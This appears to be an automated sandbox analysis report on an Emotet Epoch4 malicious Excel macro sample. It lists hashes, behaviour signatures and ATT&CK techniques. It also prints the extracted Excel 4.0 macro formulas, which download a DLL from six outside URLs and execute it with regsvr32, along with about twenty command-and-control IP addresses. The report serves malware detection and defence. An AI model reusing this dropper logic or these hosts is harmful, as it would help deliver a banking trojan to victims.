Overview

overview

10

Static

static

10

?i=1.xlsm

windows7_x64

10

?i=1.xlsm

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ?i=1

  • Size

    50KB

  • Sample

    220522-f55bssbbgq

  • MD5

    27a51dbe247857b30dbd33032d20f6cb

  • SHA1

    8a30f982176efdb9754c60835b8732ecd2496080

  • SHA256

    d0e1bf9a8969b0e7856ed1015033cef4c745a120413c76d61b1560e323de2359

  • SHA512

    fdaaa7e952bd6ff074088fbb8b185db0669fae532842f6e522e72a7d93ec3697da301b22a8050d759dc3611c897a4c3a26fc3a8b0968606bf2ca715d44115fd1

Score
10/10
emotetepoch4bankermacrotrojanxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

http://hoatuoiso1.com/replace/fVea/

https://rumkeke.com/wp-admin/A8/

https://www.restaurantgaig.com/wp-includes/HLDoANj/

http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/

http://www.hiway91.com/wp-content/Y/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/","..\rulm.dll",0,0) =IF('EGSBBB'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hoatuoiso1.com/replace/fVea/","..\rulm.dll",0,0)) =IF('EGSBBB'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rumkeke.com/wp-admin/A8/","..\rulm.dll",0,0)) =IF('EGSBBB'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.restaurantgaig.com/wp-includes/HLDoANj/","..\rulm.dll",0,0)) =IF('EGSBBB'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/","..\rulm.dll",0,0)) =IF('EGSBBB'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.hiway91.com/wp-content/Y/","..\rulm.dll",0,0)) =IF('EGSBBB'!D22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

Extracted

Family

emotet

Botnet

Epoch4

C2

68.183.94.239:80

104.131.11.205:443

138.197.109.175:8080

187.84.80.182:443

79.143.187.147:443

216.158.226.206:443

167.99.115.35:8080

212.24.98.99:8080

1.234.21.73:7080

206.189.28.199:8080

158.69.222.101:443

164.68.99.3:8080

188.44.20.25:443

185.157.82.211:8080

134.122.66.193:8080

196.218.30.83:443

72.15.201.15:8080

5.9.116.246:8080

176.104.106.96:8080

153.126.146.25:7080
eck1.plain
ecs1.plain

Targets

    • Target

      ?i=1

    • Size

      50KB

    • MD5

      27a51dbe247857b30dbd33032d20f6cb

    • SHA1

      8a30f982176efdb9754c60835b8732ecd2496080

    • SHA256

      d0e1bf9a8969b0e7856ed1015033cef4c745a120413c76d61b1560e323de2359

    • SHA512

      fdaaa7e952bd6ff074088fbb8b185db0669fae532842f6e522e72a7d93ec3697da301b22a8050d759dc3611c897a4c3a26fc3a8b0968606bf2ca715d44115fd1

    Score
    10/10
    emotetepoch4bankertrojan

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

      trojanbankeremotet

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Downloads MZ/PE file

    • Loads dropped DLL

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks